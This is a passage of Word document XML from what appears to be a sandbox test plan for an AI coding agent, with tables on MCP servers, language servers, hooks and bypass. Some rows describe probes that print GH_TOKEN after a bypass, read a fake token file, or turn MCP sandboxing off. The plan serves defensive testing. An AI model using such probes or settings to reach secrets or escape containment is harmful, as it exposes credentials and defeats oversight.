          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass exposes secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Approve a bypass for a command, then print </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GH_TOKEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Bypassed command </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">skips masking and proxy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — real secret visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Real secret visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. MCP servers, language servers and hooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Local (stdio) MCP and LSP servers run third-party code with your rights; the sandbox contains them by default. Remote MCP servers are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">never</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sandboxed — control them with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allowedMcpServers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">deniedMcpServers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="915"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1911"/>
        <w:gridCol w:w="1399"/>
        <w:gridCol w:w="1154"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1306"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Local MCP contained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add a test filesystem MCP server rooted at </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; ask it to read </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest\secrets\fake-token.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Read blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ (servers managed by Agent Host)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Read succeeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">MCP sandboxing switched off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandboxMcpServers: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (user) vs managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">User only: server runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">unsandboxed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, MC-01 ✅. Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: forced back in sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Managed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mcpServers: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → unsandboxed; managed wins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">MCP needing network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start an approved corp MCP (e.g. Jira via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npx</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ if host allowed · ⛔ otherwise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Remote MCP server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Connect </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">https://mcp.&lt;corp-domain&gt;/…</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and a non-approved URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ approved · ⛔ only if blocked by </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">deniedMcpServers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / allowlist — FS policy does </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same (sandbox irrelevant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Masked vars in local MCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Masked var configured; MCP server prints its env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Sees placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Real value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Language server works</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Open TS/C#/Python project; go-to-definition, diagnostics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ LSP runs sandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">lspServers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">LSP write outside workspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Project with a build hook that writes to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%USERPROFILE%\Desktop</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Servers you start yourself</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (VS Code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start an MCP/LSP manually outside the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Not covered</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — only Agent Host–managed servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">User / repo hooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Repo hook script writes to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%USERPROFILE%\Desktop\hook.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">inside</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sandbox; warning shown once per hook per session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Hook behaviour depends on harness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Policy hooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Admin policy hook writes an audit file outside workspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1399" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">on host, outside</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sandbox — must not run workspace scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1154" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Same (Copilot harness policy hooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1306" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Bypass, escape and session overrides</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Bypass is the "off switch" one prompt away. Prove it behaves per profile: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">available but visible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in observe rings, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gone</w:t>
      </w:r>
      <w:r>
